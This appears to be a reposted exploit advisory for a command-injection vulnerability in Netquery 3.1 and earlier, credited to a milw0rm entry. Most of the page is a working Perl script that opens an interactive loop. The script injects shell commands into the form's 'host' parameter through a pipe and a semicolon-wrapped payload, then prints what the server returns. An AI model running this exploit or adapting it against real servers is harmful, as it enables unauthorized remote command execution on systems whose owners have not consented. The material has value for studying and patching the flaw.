Netquery Command Execution (Exploit)Summary
"Netquery - the complete PHP/SQL open-source toolkit of network information utilities"
A vulnerability discovered in Netquery allows remote attackers to cause the program to execute arbitrary code, the following exploit code can be used to determine whether your system is vulnerable or not.
Credit:
The original article can be found at: http://www.milw0rm.com/id.php?id=1117
Details
Vulnerable Systems:
* Netquery versions 3.1 and prior
Exploit:
#!/usr/bin/perl -w
use strict;
use LWP;
my $browser = new LWP::UserAgent;
$browser->agent("Mozilla/4.0(compatible;MSIE 6.0;Windows NT 5.0)");
if (@ARGV < 1) {
print "\nusage: ./nq.pl http://path/to/form\n\n";
exit(1);
}
my $url = $ARGV[0];
my $command;
while (1) {
print "> ";
while(<STDIN>) {
$command = $_;
chomp($command);
last;
}
&send($command);
}
sub send {
my $ok = 0;
my $output;
my @d;
my $response = $browser->post($url,
[ 'op' => 'modload',
'name' => 'Netquery',
'file' => 'pnuser',
'querytype' => 'ping',
'host' => '| echo _start_; ' . $command . '; echo _end_;',
'maxp' => '4',
]);
die "$url could not be reached" unless $response->is_success;
if ($response->content =~ /<blockquote>_start_(.*)/) {
$output = $1;
$output =~ s/<br \/>/ \n /g;
$output =~ s/<br>/ \n /g;
@d = split /_end_/, $output;
print "\n $d[0]\n";
}
elsif ($response->content =~ /_start_(.*)/) {
$output = $1;
$output =~ s/<br \/>/ \n /g;
$output =~ s/<br>/ \n /g;
@d = split /_end_/, $output;
print "\n $d[0]\n";
}
elsif ($response->content =~ /<blockquote>(.*)/) {
$output = $1;
$output =~ s/<br \/>/ \n /g;
$output =~ s/<br>/ \n /g;
@d = split /<\/blockquote>/, $output;
print "\n $d[0]\n";
}
else {
print "Not working for some reason\n";
}
}
推荐
评论(0条)
